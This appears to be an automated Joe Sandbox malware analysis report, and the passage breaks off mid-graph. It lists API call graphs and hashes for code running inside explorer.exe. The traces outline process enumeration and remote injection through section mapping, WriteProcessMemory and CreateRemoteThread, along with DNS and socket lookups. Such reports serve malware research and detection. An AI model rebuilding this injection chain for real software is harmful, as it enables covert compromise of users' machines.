                            • RtlEnterCriticalSection.NTDLL(00CE6030), ref: 00CE33CD
                            • RtlLeaveCriticalSection.NTDLL(00CE6030), ref: 00CE33F3
                              • Part of subcall function 00CE305D: RtlZeroMemory.NTDLL(?,0000000A), ref: 00CE30AD
                              • Part of subcall function 00CE305D: StrToIntA.SHLWAPI(?), ref: 00CE30D7
                              • Part of subcall function 00CE305D: lstrlen.KERNEL32(00000000), ref: 00CE3105
                              • Part of subcall function 00CE305D: wsprintfA.USER32 ref: 00CE316C
                              • Part of subcall function 00CE305D: lstrcat.KERNEL32(00000000,00000000), ref: 00CE3198
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterLeaveMemoryQueryVirtualZerolstrcatlstrlenwsprintf
                            • String ID: POST
                            • API String ID: 2633601563-1814004025
                            • Opcode ID: 2fc2600ccecb83581fffc10b1cdd45df9231b425e1826da0d2f9669c81f0df3c
                            • Instruction ID: 06cc0d5692cd18077c4e4ceec17943f35a72b4e30f66b05ce3542634941e7c55
                            • Opcode Fuzzy Hash: 2fc2600ccecb83581fffc10b1cdd45df9231b425e1826da0d2f9669c81f0df3c
                            • Instruction Fuzzy Hash: 42F02E316042E19BCA156B27ACCEB9F77AEEFC47617040425F15797121CF34AE029762
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:5.5%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0%
                            Total number of Nodes:19
                            Total number of Limit Nodes:3
                            execution_graph 1659 d1d624 1660 d1d62f 1659->1660 1661 d1d688 1660->1661 1662 d1d6d8 3 API calls 1660->1662 1662->1661 1641 d1d6d8 1643 d1d6dd 1641->1643 1642 d1d7c5 LoadLibraryA 1642->1643 1643->1642 1645 d1d820 VirtualProtect VirtualProtect 1643->1645 1647 d1d815 1643->1647 1646 d1d8ae 1645->1646 1648 d1d60b 1649 d1d60e 1648->1649 1651 d1d688 1649->1651 1652 d1d6d8 1649->1652 1654 d1d6dd 1652->1654 1653 d1d7c5 LoadLibraryA 1653->1654 1654->1653 1656 d1d820 VirtualProtect VirtualProtect 1654->1656 1658 d1d815 1654->1658 1657 d1d8ae 1656->1657 1658->1651

                            Executed Functions

                            Function 00D1527C Relevance: 1.6, APIs: 1, Instructions: 71nativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 110 d1527c-d1528c call d11be8 113 d1530c-d15311 110->113 114 d1528e-d152c1 call d11838 110->114 118 d152c3 call d11838 114->118 119 d152ed-d15306 NtUnmapViewOfSection 114->119 124 d152c8-d152e1 118->124 121 d15318-d15327 call d1504c 119->121 122 d15308-d1530a 119->122 129 d15331-d1533a 121->129 130 d15329-d1532c call d1527c 121->130 122->113 125 d15312-d15317 call d14c90 122->125 124->119 125->121 130->129
                            APIs
                            • NtUnmapViewOfSection.NTDLL ref: 00D152F4
                            Memory Dump Source
                            • Source File: 0000000B.00000002.507771362.0000000000D11000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D11000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_d11000_explorer.jbxd
                            Similarity
                            • API ID: SectionUnmapView
                            • String ID:
                            • API String ID: 498011366-0
                            • Opcode ID: 5f7aa377d8087fab2da093bb130ce73deb8692d8e1c88252bfecd82be534d0bf
                            • Instruction ID: a2a715ed5c29cd8eec82b00d7075b2c5c9eb02b8f3d5ad654c14091b3863dbbb
                            • Opcode Fuzzy Hash: 5f7aa377d8087fab2da093bb130ce73deb8692d8e1c88252bfecd82be534d0bf
                            • Instruction Fuzzy Hash: 8111C624615E08ABEF5CFBB9F4992B93294FB58301F58012AA415C71A5ED3D8AC08331
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00D1504C Relevance: 10.7, APIs: 7, Instructions: 183processstringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00D11B74: OpenFileMappingA.KERNEL32 ref: 00D11B8B
                              • Part of subcall function 00D11B74: MapViewOfFile.KERNELBASE ref: 00D11BAA
                            • SysFreeMap.PGOCR ref: 00D150F1
                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00D150FB
                            • Process32First.KERNEL32 ref: 00D1511E
                            • lstrcmpi.KERNEL32 ref: 00D15135
                            • Process32Next.KERNEL32 ref: 00D15253
                            • FindCloseChangeNotification.KERNELBASE ref: 00D15264
                            • SleepEx.KERNEL32 ref: 00D1526F
                            Memory Dump Source
                            • Source File: 0000000B.00000002.507771362.0000000000D11000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D11000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_d11000_explorer.jbxd
                            Similarity
                            • API ID: FileProcess32$ChangeCloseCreateFindFirstFreeMappingNextNotificationOpenSleepSnapshotToolhelp32Viewlstrcmpi
                            • String ID:
                            • API String ID: 3994516788-0
                            • Opcode ID: 9c499e66052bb8766a1b90497435ee16a6197bb1b06f1221ef9de4edf2b54bed
                            • Instruction ID: 20f2373a550ac65d0ecba058ab371e186570c00f34be4a4e5f5b18aac02c0402
                            • Opcode Fuzzy Hash: 9c499e66052bb8766a1b90497435ee16a6197bb1b06f1221ef9de4edf2b54bed
                            • Instruction Fuzzy Hash: 61518531218E089FDB55EB28FC94BEA73A1FB94300F444629E447C71A5DF78D985CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00D1D6D8 Relevance: 4.8, APIs: 3, Instructions: 252memorylibraryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 51 d1d6d8-d1d6db 52 d1d6e5-d1d6e9 51->52 53 d1d6f5 52->53 54 d1d6eb-d1d6f3 52->54 55 d1d6f7 53->55 56 d1d6dd-d1d6e3 53->56 54->53 57 d1d6fa-d1d701 55->57 56->52 59 d1d703-d1d70b 57->59 60 d1d70d 57->60 59->60 60->57 61 d1d70f-d1d712 60->61 62 d1d714-d1d722 61->62 63 d1d727-d1d734 61->63 64 d1d724-d1d725 62->64 65 d1d75e-d1d779 62->65 75 d1d736-d1d738 63->75 76 d1d74e-d1d75c call d1d69a 63->76 64->63 66 d1d7aa-d1d7ad 65->66 68 d1d7b2-d1d7b9 66->68 69 d1d7af-d1d7b0 66->69 72 d1d7bf-d1d7c3 68->72 71 d1d791-d1d795 69->71 77 d1d797-d1d79a 71->77 78 d1d77b-d1d77e 71->78 73 d1d820-d1d829 72->73 74 d1d7c5-d1d7de LoadLibraryA 72->74 84 d1d82c-d1d835 73->84 80 d1d7df-d1d7e6 74->80 82 d1d73b-d1d742 75->82 76->52 77->68 83 d1d79c-d1d7a0 77->83 78->68 81 d1d780 78->81 80->72 86 d1d7e8 80->86 87 d1d781-d1d785 81->87 101 d1d744-d1d74a 82->101 102 d1d74c 82->102 83->87 88 d1d7a2-d1d7a9 83->88 89 d1d837-d1d839 84->89 90 d1d85a-d1d8aa VirtualProtect * 2 84->90 92 d1d7f4-d1d7fc 86->92 93 d1d7ea-d1d7f2 86->93 87->71 94 d1d787-d1d789 87->94 88->66 96 d1d83b-d1d84a 89->96 97 d1d84c-d1d858 89->97 91 d1d8ae-d1d8b3 90->91 91->91 98 d1d8b5-d1d8c4 91->98 99 d1d7fe-d1d80a 92->99 93->99 94->71 100 d1d78b-d1d78f 94->100 96->84 97->96 105 d1d815-d1d81f 99->105 106 d1d80c-d1d813 99->106 100->71 100->77 101->102 102->76 102->82 106->80
                            APIs
                            • LoadLibraryA.KERNELBASE ref: 00D1D7D7
                            • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00D1D881
                            • VirtualProtect.KERNELBASE ref: 00D1D89F
                            Memory Dump Source
                            • Source File: 0000000B.00000002.508095233.0000000000D1C000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D1C000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_d1c000_explorer.jbxd
                            Similarity
                            • API ID: ProtectVirtual$LibraryLoad
                            • String ID:
                            • API String ID: 895956442-0
                            • Opcode ID: 766ecf42a46ccbb9d59950cf19f9f47b0ded34198e0758b122ab6bfde978edc0
                            • Instruction ID: 10801cb8e27d2076fbf45d567af0ba50a31a54400d6246d82b39307bcf758b51
                            • Opcode Fuzzy Hash: 766ecf42a46ccbb9d59950cf19f9f47b0ded34198e0758b122ab6bfde978edc0
                            • Instruction Fuzzy Hash: AC516A3225891D6BCB24AA7CBCC03F5B3D3E755325B58062AC49AC32C5DF68D8C6C3A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00D11B74 Relevance: 3.0, APIs: 2, Instructions: 40fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 107 d11b74-d11b94 OpenFileMappingA 108 d11bb7-d11bc4 107->108 109 d11b96-d11bb4 MapViewOfFile 107->109 109->108
                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.507771362.0000000000D11000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D11000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_d11000_explorer.jbxd
                            Similarity
                            • API ID: File$MappingOpenView
                            • String ID:
                            • API String ID: 3439327939-0
                            • Opcode ID: 3d68cadb71721c25b2f35a99aaf9e4fa7e4534b0fc75c346aa0e398d83fb51cc
                            • Instruction ID: a353ccecbd8cf70fd6d923eb6f393a3ac4a304a185f1c785fa48aabdedc56d84
                            • Opcode Fuzzy Hash: 3d68cadb71721c25b2f35a99aaf9e4fa7e4534b0fc75c346aa0e398d83fb51cc
                            • Instruction Fuzzy Hash: D2F01C35318F094FAB44EF7C9CCC176B7E1EBA9202B048A7EA95AC7165EF34C8818711
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 00D173EF Relevance: .8, Instructions: 826COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 264 d173ef-d17423 265 d17425 264->265 266 d17426-d1742f 264->266 265->266 267 d17431 266->267 268 d17432-d174e5 266->268 267->268 271 d174e7 268->271 272 d174fc-d174fd 268->272 273 d174e9 271->273 274 d174ea-d174f7 271->274 275 d17515-d1751f 272->275 276 d174ff-d17514 272->276 273->274 277 d174f9 274->277 278 d174fa-d174fb 274->278 279 d17521 275->279 280 d1752d 275->280 276->275 277->278 278->272 281 d17523-d1752a 279->281 282 d1752e-d1752f 279->282 280->282 281->280 283 d17531-d1754a 282->283 284 d1754c-d17551 282->284 283->284 285 d17553-d17558 284->285 286 d1755c-d17563 284->286 285->286 287 d17565 286->287 288 d17566-d17585 286->288 287->288 289 d17587-d1758d 288->289 290 d1759c-d175a0 288->290 291 d175a1-d175e3 289->291 292 d1758f-d1759b 289->292 290->291 293 d175e5 291->293 294 d175e6-d175f3 291->294 292->290 293->294 295 d175f5 294->295 296 d175f6-d17609 294->296 295->296 297 d17617-d17621 296->297 298 d1760b-d17614 296->298 299 d17623-d17634 297->299 300 d17638-d17643 297->300 298->297 299->300 301 d17645 300->301 302 d17646-d17651 300->302 301->302 303 d17653-d1765e 302->303 304 d1765f-d17667 302->304 303->304 305 d17669 304->305 306 d1766a-d176a3 304->306 305->306 307 d176a5 306->307 308 d176a6-d176c5 306->308 307->308 309 d176c7-d176d1 308->309 310 d176db-d176e1 308->310 311 d176d3-d176d9 309->311 312 d176e6-d176ed 309->312 313 d176e3-d176e5 310->313 314 d176f7-d176f9 310->314 311->310 315 d176fa-d176ff 312->315 316 d176ef-d176f4 312->316 313->312 314->315 317 d17701 315->317 318 d17702-d17747 315->318 316->314 317->318 319 d17749 318->319 320 d1774a-d179d8 318->320 319->320 342 d17a56-d17a59 320->342 343 d179da-d17a09 320->343 344 d17a5a-d17a88 342->344 347 d17a0b-d17a54 343->347 344->347 348 d17a8a-d17ad8 344->348 347->342 348->344 352 d17ada-d17ae0 348->352
                            Memory Dump Source
                            • Source File: 0000000B.00000002.507771362.0000000000D11000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D11000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_d11000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e93eb12f35a254452e59da495d03ddf4922dd92ef586a952151bcee0553a0dce
                            • Instruction ID: 6841ded3e1a8742641a7fdc883fd964e4fc58683446721b2e91e26744e7b9d03
                            • Opcode Fuzzy Hash: e93eb12f35a254452e59da495d03ddf4922dd92ef586a952151bcee0553a0dce
                            • Instruction Fuzzy Hash: 7452DDA684E3C26FD7534B74AC756917FB0AE23224B1E44DBC0C4CF4B3E619598AC762
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00D12450 Relevance: .4, Instructions: 402COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 356 d12450-d124ec call d12408 call d11838 call d118f8 call d12268 365 d124f9-d124ff 356->365 366 d124ee-d124f7 356->366 367 d12501-d1250d 365->367 366->367 369 d127f3-d12811 call d11860 367->369 370 d12513-d1254c 367->370 375 d12552-d12561 370->375 376 d127ea-d127eb 370->376 377 d12563-d12574 call d12338 375->377 378 d1257b-d1257c 375->378 376->369 382 d12593-d1259b 377->382 383 d12576-d12579 377->383 379 d1257f-d12591 378->379 379->382 385 d125a1-d12606 call d11938 382->385 386 d127d8-d127db 382->386 383->379 393 d127cb-d127d5 385->393 394 d1260c-d12610 385->394 387 d127e5-d127e6 386->387 388 d127dd-d127e0 call d11860 386->388 387->376 388->387 393->386 395 d12630-d1265c call d11838 394->395 396 d12612-d12623 394->396 401 d12668-d1266b 395->401 396->395 402 d1266d 401->402 403 d1265e-d12662 401->403 406 d12675-d12693 402->406 404 d12664-d12665 403->404 405 d1266f-d12671 403->405 404->401 405->406 408 d126d0-d126fc 406->408 409 d12695-d126c8 call d11838 406->409 413 d12702-d12712 408->413 414 d127ac-d127c1 call d11860 408->414 409->408 413->414 418 d12718-d1272a call d11838 413->418 414->393 422 d127c3-d127c6 call d11860 414->422 425 d1272c-d12736 418->425 422->393 426 d12738-d1274b call d1188c 425->426 427 d1274d-d1276d 425->427 426->427 431 d12771-d12779 427->431 432 d1276f 427->432 431->425 433 d1277b-d1277d 431->433 432->431 434 d1279f-d127a8 call d11860 433->434 435 d1277f-d12795 call d118d0 433->435 434->414 435->434
                            Memory Dump Source
                            • Source File: 0000000B.00000002.507771362.0000000000D11000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D11000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_d11000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e118273b6bd13228560ac9c2cec034c895b25088e2b6ecd5b19a103385d93699
                            • Instruction ID: fac9db4eed86ea0b0d6796918192c9bbc7a97fe52ed8d75f3565c0fac8a14c49
                            • Opcode Fuzzy Hash: e118273b6bd13228560ac9c2cec034c895b25088e2b6ecd5b19a103385d93699
                            • Instruction Fuzzy Hash: FAC1C530618B089FDB59EF6CA8596BE77E1FB98300F14462EE44AC3291DF35D846C792
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00D12D60 Relevance: .3, Instructions: 318COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 440 d12d60-d12d9b call d11be8 443 d12dad-d12dc3 440->443 444 d12d9d-d12da7 440->444 445 d13057-d1306e 443->445 447 d12dc9-d12dd3 call d11be8 443->447 444->443 444->445 447->445 450 d12dd9-d12de0 447->450 451 d12e01-d12e4a call d12c74 * 2 450->451 452 d12de2-d12df4 450->452 457 d12e50-d12e53 451->457 458 d1304e-d1304f 451->458 452->451 457->458 459 d12e59-d12efb call d12c74 call d12b20 call d12c74 457->459 458->445 470 d13011-d13032 459->470 471 d12f01-d12f20 459->471 474 d13034 470->474 476 d12f22-d12f36 471->476 477 d12f38-d12f3a 471->477 478 d1303a-d13045 474->478 476->471 477->471 479 d12f3c-d12f80 477->479 478->458 486 d13007-d1300a 479->486 487 d12f86-d12fb5 479->487 486->478 488 d1300c-d1300f 486->488 487->486 490 d12fb7-d12ffd 487->490 488->474 490->486
                            Memory Dump Source
                            • Source File: 0000000B.00000002.507771362.0000000000D11000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D11000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_d11000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9c5c8b1994fe28c2e4552cb0fb8e0af334840768fe5626a45a9e663353f6e7b3
                            • Instruction ID: e851bbccdfe14cf05c0598ad21e0e7951a9c94f72fc28c96c1630f1351d6274d
                            • Opcode Fuzzy Hash: 9c5c8b1994fe28c2e4552cb0fb8e0af334840768fe5626a45a9e663353f6e7b3
                            • Instruction Fuzzy Hash: 3C91A530718B089FDB59EF68E8596AD77E6FB98700F04422AE44BC3251DF34DA418BD2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:10.6%
                            Dynamic/Decrypted Code Coverage:97.4%
                            Signature Coverage:0%
                            Total number of Nodes:310
                            Total number of Limit Nodes:42
                            execution_graph 988 9d283f 989 9d284b 988->989 990 9d2608 VirtualQuery 988->990 991 9d285f 989->991 992 9d284f GetProcessHeap HeapFree 989->992 990->989 992->991 993 9d245e lstrlen 994 9d24a5 993->994 995 9d2476 CryptBinaryToStringA 993->995 995->994 996 9d2489 995->996 999 9d2861 GetProcessHeap RtlAllocateHeap 996->999 998 9d2494 CryptBinaryToStringA 998->994 999->998 711 9d7728 712 9d7904 711->712 713 9d774b 711->713 712->712 714 9d785a LoadLibraryA 713->714 718 9d789f VirtualProtect VirtualProtect 713->718 715 9d7871 714->715 715->713 717 9d7883 GetProcAddress 715->717 717->715 719 9d7899 717->719 718->712 1006 9d1425 1007 9d144b 1006->1007 1008 9d1432 1006->1008 1009 9d2608 VirtualQuery 1008->1009 1010 9d143a 1009->1010 1010->1007 1011 9d1493 23 API calls 1010->1011 1011->1007 1012 9d2806 VirtualFree 1013 9d1eb6 1014 9d1ecc lstrlen 1013->1014 1015 9d1ed9 1013->1015 1014->1015 1024 9d2861 GetProcessHeap RtlAllocateHeap 1015->1024 1017 9d1ee1 lstrcat 1018 9d1f1d 1017->1018 1019 9d1f16 lstrcat 1017->1019 1025 9d1f4a 1018->1025 1019->1018 1022 9d2843 3 API calls 1023 9d1f40 1022->1023 1024->1017 1059 9d22b8 1025->1059 1029 9d1f77 1064 9d27e2 lstrlen MultiByteToWideChar 1029->1064 1031 9d1f86 1065 9d2374 RtlZeroMemory 1031->1065 1034 9d1fd8 RtlZeroMemory 1036 9d200d 1034->1036 1035 9d2843 3 API calls 1037 9d1f2d 1035->1037 1040 9d229a 1036->1040 1042 9d203b 1036->1042 1067 9d22e5 1036->1067 1037->1022 1039 9d2280 1039->1040 1041 9d2843 3 API calls 1039->1041 1040->1035 1041->1040 1042->1039 1076 9d2861 GetProcessHeap RtlAllocateHeap 1042->1076 1044 9d210b wsprintfW 1045 9d2131 1044->1045 1049 9d219e 1045->1049 1077 9d2861 GetProcessHeap RtlAllocateHeap 1045->1077 1047 9d216b wsprintfW 1047->1049 1048 9d225d 1050 9d2843 3 API calls 1048->1050 1049->1048 1078 9d2861 GetProcessHeap RtlAllocateHeap 1049->1078 1051 9d2271 1050->1051 1051->1039 1053 9d2843 3 API calls 1051->1053 1053->1039 1054 9d21e9 1055 9d2256 1054->1055 1079 9d2815 VirtualAlloc 1054->1079 1057 9d2843 3 API calls 1055->1057 1057->1048 1058 9d2243 RtlMoveMemory 1058->1055 1060 9d1f69 1059->1060 1061 9d22c2 1059->1061 1063 9d2861 GetProcessHeap RtlAllocateHeap 1060->1063 1062 9d26e6 2 API calls 1061->1062 1062->1060 1063->1029 1064->1031 1066 9d1f96 1065->1066 1066->1034 1066->1040 1069 9d22f2 1067->1069 1071 9d2353 1067->1071 1068 9d22f6 DnsQuery_W 1068->1069 1069->1068 1070 9d2335 DnsFree inet_ntoa 1069->1070 1069->1071 1070->1069 1072 9d2355 1070->1072 1071->1042 1080 9d2861 GetProcessHeap RtlAllocateHeap 1072->1080 1074 9d235f 1081 9d27e2 lstrlen MultiByteToWideChar 1074->1081 1076->1044 1077->1047 1078->1054 1079->1058 1080->1074 1081->1071 720 9d1000 721 9d1007 720->721 722 9d1010 720->722 724 9d1016 721->724 772 9d2608 VirtualQuery 724->772 727 9d1097 727->722 729 9d102c RtlMoveMemory 730 9d104d 729->730 731 9d1071 NtUnmapViewOfSection GetCurrentProcessId 729->731 836 9d2861 GetProcessHeap RtlAllocateHeap 730->836 733 9d109e 731->733 734 9d1092 731->734 802 9d10a4 733->802 734->727 775 9d1332 734->775 735 9d1052 RtlMoveMemory 735->731 737 9d10a3 739 9d2861 GetProcessHeap RtlAllocateHeap 737->739 740 9d10cc 739->740 741 9d10dc CreateToolhelp32Snapshot 740->741 742 9d10f0 Process32First 741->742 743 9d1322 Sleep 741->743 744 9d110c lstrcmpi 742->744 745 9d131b FindCloseChangeNotification 742->745 743->741 746 9d1124 lstrcmpi 744->746 747 9d1280 744->747 745->743 746->747 748 9d1138 lstrcmpi 746->748 749 9d25ad OpenProcess IsWow64Process IsWow64Process CloseHandle 747->749 752 9d1305 Process32Next 747->752 760 9d2608 VirtualQuery 747->760 764 9d12ae lstrcmpi 747->764 768 9d1819 30 API calls 747->768 748->747 750 9d114c lstrcmpi 748->750 749->747 750->747 751 9d1160 lstrcmpi 750->751 751->747 753 9d1170 lstrcmpi 751->753 752->744 754 9d1319 752->754 753->747 755 9d1184 lstrcmpi 753->755 754->745 755->747 756 9d1198 lstrcmpi 755->756 756->747 757 9d11ac lstrcmpi 756->757 757->747 758 9d11c0 lstrcmpi 757->758 758->747 759 9d11d4 lstrcmpi 758->759 759->747 761 9d11e8 lstrcmpi 759->761 760->747 761->747 762 9d11fc lstrcmpi 761->762 762->747 763 9d120c lstrcmpi 762->763 763->747 765 9d121c lstrcmpi 763->765 764->747 765->747 766 9d122c lstrcmpi 765->766 766->747 767 9d123c lstrcmpi 766->767 767->747 769 9d124c lstrcmpi 767->769 768->747 769->747 770 9d125c lstrcmpi 769->770 770->747 771 9d126c lstrcmpi 770->771 771->747 771->752 773 9d101e 772->773 773->727 774 9d2861 GetProcessHeap RtlAllocateHeap 773->774 774->729 837 9d2861 GetProcessHeap RtlAllocateHeap 775->837 777 9d1340 GetModuleFileNameA 838 9d2861 GetProcessHeap RtlAllocateHeap 777->838 779 9d1357 GetCurrentProcessId wsprintfA 839 9d263e CryptAcquireContextA 779->839 782 9d140d 862 9d2843 782->862 783 9d139c Sleep 844 9d24d5 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 783->844 786 9d13ae GetModuleHandleA GetProcAddress 788 9d13c9 786->788 789 9d13da GetModuleHandleA GetProcAddress 786->789 852 9d1de3 788->852 792 9d13f5 789->792 793 9d1406 789->793 790 9d2843 3 API calls 794 9d141b RtlExitUserThread 790->794 795 9d1de3 3 API calls 792->795 796 9d24d5 10 API calls 793->796 797 9d1425 794->797 795->793 796->782 798 9d2608 VirtualQuery 797->798 799 9d144b 797->799 800 9d143a 798->800 799->733 800->799 867 9d1493 800->867 935 9d2861 GetProcessHeap RtlAllocateHeap 802->935 804 9d10cc 805 9d10dc CreateToolhelp32Snapshot 804->805 806 9d10f0 Process32First 805->806 807 9d1322 Sleep 805->807 808 9d110c lstrcmpi 806->808 809 9d131b FindCloseChangeNotification 806->809 807->805 810 9d1124 lstrcmpi 808->810 820 9d1280 808->820 809->807 811 9d1138 lstrcmpi 810->811 810->820 813 9d114c lstrcmpi 811->813 811->820 814 9d1160 lstrcmpi 813->814 813->820 816 9d1170 lstrcmpi 814->816 814->820 815 9d1305 Process32Next 815->808 817 9d1319 815->817 818 9d1184 lstrcmpi 816->818 816->820 817->809 819 9d1198 lstrcmpi 818->819 818->820 819->820 821 9d11ac lstrcmpi 819->821 820->815 824 9d2608 VirtualQuery 820->824 828 9d12ae lstrcmpi 820->828 936 9d25ad OpenProcess 820->936 942 9d1819 820->942 821->820 822 9d11c0 lstrcmpi 821->822 822->820 823 9d11d4 lstrcmpi 822->823 823->820 825 9d11e8 lstrcmpi 823->825 824->820 825->820 826 9d11fc lstrcmpi 825->826 826->820 827 9d120c lstrcmpi 826->827 827->820 829 9d121c lstrcmpi 827->829 828->820 829->820 830 9d122c lstrcmpi 829->830 830->820 831 9d123c lstrcmpi 830->831 831->820 833 9d124c lstrcmpi 831->833 833->820 834 9d125c lstrcmpi 833->834 834->820 835 9d126c lstrcmpi 834->835 835->815 835->820 836->735 837->777 838->779 840 9d1384 CreateMutexA GetLastError 839->840 841 9d2664 CryptCreateHash lstrlen CryptHashData CryptGetHashParam 839->841 840->782 840->783 842 9d26aa wsprintfA 841->842 842->842 843 9d26cc CryptDestroyHash CryptReleaseContext 842->843 843->840 845 9d2515 844->845 846 9d2565 CloseHandle 845->846 847 9d2555 Thread32Next 845->847 848 9d2521 OpenThread 845->848 846->786 847->845 849 9d253c SuspendThread 848->849 850 9d2544 ResumeThread 848->850 851 9d254a CloseHandle 849->851 850->851 851->847 853 9d1ded 852->853 861 9d1e56 852->861 853->861 894 9d1e93 VirtualProtect 853->894 855 9d1e04 855->861 895 9d2815 VirtualAlloc 855->895 857 9d1e10 858 9d1e2d 857->858 859 9d1e1a RtlMoveMemory 857->859 896 9d1e93 VirtualProtect 858->896 859->858 861->789 863 9d2608 VirtualQuery 862->863 864 9d284b 863->864 865 9d1414 864->865 866 9d284f GetProcessHeap HeapFree 864->866 865->790 866->865 868 9d14a1 867->868 869 9d14c0 867->869 897 9d17c7 868->897 871 9d14c8 869->871 872 9d1510 869->872 874 9d17c7 5 API calls 871->874 891 9d14b6 871->891 916 9d26e6 lstrlen lstrlen 872->916 876 9d14e0 874->876 876->891 904 9d1647 876->904 877 9d155f 878 9d26e6 2 API calls 877->878 881 9d156c 878->881 879 9d1532 918 9d1752 GetModuleHandleA GetProcAddress 879->918 884 9d1584 881->884 885 9d15a0 881->885 881->891 921 9d2404 lstrlen 884->921 887 9d2404 5 API calls 885->887 885->891 890 9d15ac 887->890 888 9d1647 11 API calls 888->891 890->891 892 9d1647 11 API calls 890->892 891->799 893 9d14fb 892->893 893->891 927 9d15e0 893->927 894->855 895->857 896->861 898 9d1812 897->898 899 9d17d1 897->899 898->891 899->898 900 9d26e6 2 API calls 899->900 901 9d17f1 900->901 901->898 932 9d2861 GetProcessHeap RtlAllocateHeap 901->932 903 9d1804 RtlMoveMemory 903->898 905 9d1660 904->905 915 9d1745 904->915 906 9d1671 lstrlen 905->906 905->915 907 9d1683 lstrlen 906->907 906->915 908 9d1690 getpeername 907->908 907->915 909 9d16ae inet_ntoa htons 908->909 908->915 910 9d16cc 909->910 909->915 910->915 933 9d2861 GetProcessHeap RtlAllocateHeap 910->933 912 9d1717 wsprintfA 913 9d173a 912->913 914 9d2843 3 API calls 913->914 913->915 914->915 915->893 917 9d151d 916->917 917->877 917->879 919 9d1776 RtlZeroMemory RtlZeroMemory RtlZeroMemory RtlZeroMemory 918->919 920 9d1539 918->920 919->920 920->888 920->891 922 9d241c CryptStringToBinaryA 921->922 923 9d2456 921->923 922->923 924 9d2438 922->924 923->891 934 9d2861 GetProcessHeap RtlAllocateHeap 924->934 926 9d2444 CryptStringToBinaryA 926->923 928 9d2843 3 API calls 927->928 929 9d15f5 928->929 930 9d2843 3 API calls 929->930 931 9d15fc 930->931 931->891 932->903 933->912 934->926 935->804 937 9d25cb IsWow64Process 936->937 938 9d2600 936->938 939 9d25dc IsWow64Process 937->939 940 9d25ee 937->940 938->820 939->940 941 9d25f9 CloseHandle 939->941 940->941 941->938 943 9d2608 VirtualQuery 942->943 944 9d1833 943->944 945 9d1845 OpenProcess 944->945 947 9d1a76 944->947 946 9d185e 945->946 945->947 948 9d2608 VirtualQuery 946->948 947->820 949 9d1865 948->949 949->947 950 9d188f 949->950 951 9d1873 NtSetInformationProcess 949->951 973 9d1a80 950->973 951->950 954 9d1a80 2 API calls 955 9d18d6 954->955 956 9d1a73 CloseHandle 955->956 957 9d1a80 2 API calls 955->957 956->947 958 9d1900 957->958 979 9d1b17 958->979 961 9d1a80 2 API calls 962 9d1930 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 961->962 963 9d1a4e CreateRemoteThread 962->963 964 9d1985 962->964 966 9d1a65 CloseHandle 963->966 965 9d198b CreateMutexA GetLastError 964->965 969 9d19bb GetModuleHandleA GetProcAddress ReadProcessMemory 964->969 965->964 967 9d19a7 CloseHandle Sleep 965->967 968 9d1a67 CloseHandle CloseHandle 966->968 967->965 968->956 970 9d19ec WriteProcessMemory 969->970 971 9d1a47 969->971 970->971 972 9d1a16 CreateRemoteThread CloseHandle Sleep WriteProcessMemory 970->972 971->966 971->968 972->971 974 9d1a94 973->974 978 9d18b4 973->978 975 9d1aa4 NtCreateSection 974->975 976 9d1ac3 974->976 975->976 977 9d1ad8 NtMapViewOfSection 976->977 976->978 977->978 978->954 980 9d1b2e 979->980 981 9d1b60 979->981 982 9d1b30 RtlMoveMemory 980->982 983 9d1b71 LoadLibraryA 981->983 986 9d1bc3 981->986 987 9d1ba1 GetProcAddress 981->987 982->981 982->982 983->981 985 